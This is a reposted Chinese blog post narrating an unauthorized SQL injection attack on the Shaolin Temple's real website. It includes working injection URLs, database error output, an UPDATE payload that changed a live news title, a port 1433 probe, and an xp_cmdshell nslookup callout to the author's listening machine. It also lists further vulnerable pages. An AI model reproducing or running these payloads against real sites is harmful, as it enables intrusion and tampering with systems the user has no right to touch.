對少林寺網站的sql注入滲透

來源:互聯網
上載者:User
剛才從新聞上聽到一條訊息:少林網站公布武功秘笈;呵呵!這個比較爽!
  順便就去少林寺的網站上看了看,http://www.shaolin.org.cn/
  開啟後,看到有新聞系統,隨意瀏覽了一下幾條新聞,都是html的,似乎沒什麼問題,但是當我把滑鼠放到首頁新聞上時,發現他的串連是“javascript:MM_openBrWindow('../../../asp/news_article.asp?
NewsID=649','news','scrollbars=yes,width=520,height=400')”,大家可能注意到了,有可能存在注入,我也是沒事看電視,那就滲透一下試試。
  1、輸入地址:
  http://www.shaolin.org.cn/../../../asp/news_article.asp?NewsID=649,
  可以開啟新聞,說明url正確,加'後,返回
----------------------------------------------------------------------------------
Microsoft OLE DB Provider for SQL Server 錯誤 '80040e14'
Unclosed quotation mark before the character string '''.
/asp/lib/lib.asp,行710
----------------------------------------------------------------------------------
  應該是sql資料庫。
  2、使用' having 1=1—,提示
----------------------------------------------------------------------------------
Microsoft OLE DB Provider for SQL Server 錯誤 '80040e14'
Column 'Shaolin_NewsList.NewsID' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.
/asp/lib/lib.asp,行710
----------------------------------------------------------------------------------
  很快就能獲得它的表shaolin_newslist的所有欄位:newsid、NewsUpdateDat、NewsTitle、NewsContent
  3、接下來我測試了一下資料庫使用者權限
http://www.shaolin.org.cn/asp/news_article.asp?NewsID=649';
update%20shaolin_newslist%20set%20NewsTitle='少林藥局數百醫學養生秘方首次向世界公開!'%20where%20newsid=649--
  圖:
<p><img src="20040808001.JPG"
alt="照片.JPG (663395 bytes)" width="527" height="234"></p>


  看來對錶有完整許可權,可以增刪改
  4、接著看1433開沒
  telnet www.shaolin.org.cn 1433
  看來開著
  5、那試試資料庫操作員的許可權
  本地監聽udp 53:Nc –u –l –p 53
  然後訪問:
http://www.shaolin.org.cn/../../../asp/news_article.asp?NewsID=649';
exec master.dbo.xp_cmdshell 'nslookup a.com *.*.*.*'--
  *為我的ip地址,
  沒有反應,那麼應該不是sysadmin許可權了
  看來許可權就是這些,因為沒有系統的收集資訊,也不打算怎麼樣,就到此為止!其實還有很多頁面都存在這個問題,比如:
  http://www.shaolin.org.cn/html/html/wu/menu4.htm
  http://www.shaolin.org.cn/html/html/wu/teach_wushu.asp
  中傳遞參數的位置,看見那些絕世武功了嗎?如果你願意,可以給他添一條“XXX”什麼的,呵呵!
  其實,在1年前就用過類似方法測試過本地比較大的幾個資訊港,隨後就給他們提交了漏洞報告,但是到現在漏洞還在那裡擺著,為了不給自己惹麻煩,至今也沒有公布出來,還是等他們修補了,我再公布細節吧!
====================================================================================================
  發給網管沒反應,在bbs上,我註冊coolersky後,死活沒有找到怎麼發帖,沒轍!聽天由命吧,最好不要被小日本搞定!




相關文章

Cloud Intelligence Leading the Digital Future

Alibaba Cloud ACtivate Online Conference, Nov. 20th & 21st, 2019 (UTC+08)

Register Now >

Starter Package

SSD Cloud server and data transfer for only $2.50 a month

Get Started >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。